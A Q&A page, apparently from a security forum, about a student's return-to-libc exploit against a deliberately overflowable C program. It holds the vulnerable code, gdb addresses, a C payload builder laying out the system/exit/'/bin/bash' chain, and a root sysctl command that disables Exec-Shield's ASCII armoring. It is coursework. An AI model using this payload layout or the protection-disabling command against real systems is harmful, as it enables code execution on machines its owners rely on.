Writing a return-to-libc attack, but libc is loaded at 0x00 in memory


Question

I'm writing a return to libc attack for my systems security class. First, the vulnerable code:

//vuln.c
#include <stdio.h>
#include <stdlib.h>

int loadconfig(void){
  char buf[1024];
  /* Unbounded sprintf: $HOME longer than ~1015 bytes overflows buf
     and overwrites the saved ebp and return address (intentional). */
  sprintf(buf, "%s/.config", getenv("HOME"));
  return 0;
}

int main(int argc, char **argv){
  loadconfig();
  return 0;
}

I want to use a return to libc attack. Compiling and debugging the program:

$ gcc -g -fno-stack-protector -o vuln vuln.c
$ gdb vuln
(gdb) break loadconfig
(gdb) run
Reached breakpoint blah blah blah.
(gdb) p $ebp
$1 = (void *) 0xbfffefb0
(gdb) p system
$2 = {<text variable, no debug info>} 0x0016db20 <system>
(gdb) p exit
$3 = {<text variable, no debug info>} 0x001639e0 <exit>
(gdb) x/2000s $esp
...
0xbffff5af:    "SHELL=/bin/bash"

To execute the attack, I want to overflow the buffer into loadconfig's return address (aka $esp+4), replacing it with the return address for system, then the return address for exit (since system expects a real return address), then the command name (the address of SHELL=/bin/bash plus 6, to trim the SHELL= part). This should be possible by crafting a $HOME environment variable of 1024 characters of crap, then the little-endian address of system, exit, and /bin/bash.

However, with every computer I've tried, system gets loaded at an address that starts with 0x00, which will null terminate the string that sprintf is reading and stop the attack dead. Is there some way to force libc to load elsewhere in memory, or am I misinterpreting the attack?

For reference, I'm running an Ubuntu Server 11.10 virtual machine in VirtualBox (Windows host), with gcc version 4.6.1 and gdb version 7.3-2011.08. edit: ASLR is disabled, and I compiled with -fno-stack-protector to remove the canary. Since I'm not executing anything from the stack, I don't need to execstack it.
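The payload layout the question describes, written out as an added example (not code from the original post): it builds the [filler][&system][&exit][&"/bin/bash"] chain little-endian, then checks the one thing that kills it here, a 0x00 byte inside an address, by simulating what a C-string copy such as sprintf's %s actually delivers. The pad value (distance from buf to the saved return address) is taken as 1024 to match the question but must really be measured in gdb, since the saved ebp and any alignment padding sit between them; the "NUL-free" libc addresses 0xb7e4f430 and 0xb7e42b70 are hypothetical values for comparison, not from the page.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Classic 32-bit return-to-libc layout:
 *
 *   [pad bytes of filler][&system][&exit][&"/bin/bash"]
 *
 * pad is the distance from the start of buf to the saved return address.
 * It is NOT simply sizeof(buf): the saved ebp and any alignment padding the
 * compiler inserts sit in between, so measure it in gdb
 * (e.g. (char *)$ebp + 4 - (char *)&buf) instead of assuming 1024 + 4.
 */

/* Store a 32-bit value little-endian, the way an x86 stack slot holds it. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Build the payload into out. Returns its length, or 0 if cap is too small. */
size_t build_ret2libc(unsigned char *out, size_t cap, size_t pad,
                      uint32_t system_addr, uint32_t exit_addr,
                      uint32_t cmd_addr)
{
    size_t len = pad + 3 * 4;
    if (len > cap)
        return 0;
    memset(out, 'A', pad);
    put_le32(out + pad, system_addr);   /* lands on the saved return address */
    put_le32(out + pad + 4, exit_addr); /* where system() "returns" to      */
    put_le32(out + pad + 8, cmd_addr);  /* system()'s first argument         */
    return len;
}

/* 1 if any byte of addr is 0x00, i.e. it cannot survive a C-string copy. */
int addr_has_nul(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}

/*
 * How many payload bytes actually reach the target buffer when delivered
 * through a C string: the environment block, getenv() and sprintf's %s all
 * stop at the first NUL. Equals len only when the whole chain is intact.
 */
size_t bytes_delivered(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0)
            return i;
    return len;
}

int main(void)
{
    unsigned char payload[2048];
    /* Addresses from the question's gdb session; 0xbffff5af + 6 skips "SHELL=". */
    const uint32_t sys_q = 0x0016db20u, exit_q = 0x001639e0u;
    const uint32_t cmd_q = 0xbffff5afu + 6;
    size_t n = build_ret2libc(payload, sizeof payload, 1024, sys_q, exit_q, cmd_q);
    printf("payload %zu bytes, %zu delivered; system at %#x %s\n",
           n, bytes_delivered(payload, n), (unsigned)sys_q,
           addr_has_nul(sys_q) ? "contains a NUL byte (ASCII-armored)"
                               : "is NUL-free");
    /* Hypothetical NUL-free libc addresses, for comparison only. */
    n = build_ret2libc(payload, sizeof payload, 1024, 0xb7e4f430u, 0xb7e42b70u, cmd_q);
    printf("with NUL-free addresses: %zu of %zu bytes delivered\n",
           bytes_delivered(payload, n), n);
    return 0;
}
```

With the question's addresses the copy stops at offset 1027, three bytes into &system, so the return address becomes 20 db 16 followed by the '/' of "/.config" rather than 0x0016db20; the chain never starts. The same layout with NUL-free addresses is delivered whole.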

Answer

The act of mapping important libc functions to addresses which contain a NULL byte is called ASCII armoring. This protection is part of RedHat Exec-Shield, which is currently enabled on recent Ubuntu distros (https://wiki.ubuntu.com/SecurityTeam/Roadmap/KernelHardening). To disable it you have to run as root:

sysctl -w kernel.exec-shield=0

As explained here.

By the way, you can find interesting material about how to bypass ASCII armoring here on exploit-db.
